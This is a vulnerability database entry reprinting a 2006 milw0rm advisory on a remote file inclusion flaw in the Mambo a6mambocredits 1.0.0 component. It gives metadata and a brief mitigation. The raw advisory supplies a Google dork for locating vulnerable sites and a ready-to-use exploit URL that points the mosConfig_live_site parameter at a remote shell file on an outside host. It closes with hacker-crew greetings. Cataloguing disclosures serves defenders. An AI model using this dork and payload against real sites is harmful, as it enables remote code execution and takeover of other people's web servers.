header-logo
Suggest Exploit
vendor:
Mambo a6mambocredits component
by:
Charles Nelwan a.k.a Cmaster4
3,3
CVSS
LOW
Remote File Inclusion
98
CWE
Product Name: Mambo a6mambocredits component
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mambo:mambo_a6mambocredits_component:1.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Mambo a6mambocredits component v1.0.0 <== (mosConfig_live_site) Remote File Include Vulnerabilities

Mambo a6mambocredits component v1.0.0 is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to the 'mosConfig_live_site' parameter in the 'admin.a6mambocredits.php' script not properly sanitized before being used to include files. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used to include files.
Source

Exploit-DB raw data:

Title : Mambo a6mambocredits component v1.0.0 <== (mosConfig_live_site) Remote File Include Vulnerabilities

Affected Application: Mambo a6mambocredits component v1.0.0

(Mambo CMS Component)


. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


Discoverd/Found by: Charles Nelwan a.k.a Cmaster4

Team: #BatamHacker irc.dal.net crew

URL: http://www.batamhacker.info/forum

E-Mail: bugtraq_indo@yahoo.com


. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .


Typ: Remote [x] Local [ ]

Remote File Inclusion [x] SQL Injection [ ]

Level: Low [ ] Middle [x] High [ ]

Application: Mambo a6mambocredits

Version: 1.0.0

Vulnerable File: admin.a6mambocredits.php

URL: www.active6.com

Description: Mambo 4.5.1 component to display component credits in one central page.

google dork : inurl:"com_a6mambocredits"



. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt


Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker 

# milw0rm.com [2006-08-17]

Navigation

Suggest Exploit

Services By CQR